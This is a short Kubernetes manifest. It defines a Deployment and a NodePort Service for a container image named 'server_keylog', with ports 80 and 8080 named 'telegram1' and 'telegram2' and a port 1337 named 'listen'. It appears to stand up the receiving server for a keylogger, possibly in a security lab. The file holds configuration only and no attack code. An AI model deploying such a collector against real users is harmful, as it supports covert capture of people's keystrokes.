---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: server-keylog-pod
  labels:
    app: server
spec:
  replicas: 1
  selector:
    matchLabels:
      app: server
  template:
    metadata:
      labels:
        app: server
    spec:
      containers:
      - name: server
        image: secops113/server_keylog
        ports:
        - containerPort: 80
        - containerPort: 8080
        - containerPort: 1337
---
apiVersion: v1
kind: Service
metadata:
  name: keylog-service
spec:
  type: NodePort
  selector:
    app: server
  ports:
    - protocol: TCP
      port: 80
      name: "telegram1"
      targetPort: 80
    - protocol: TCP
      port: 8080
      name: "telegram2"
      targetPort: 8080
    - protocol: TCP
      name: "listen"
      port: 1337
      targetPort: 1337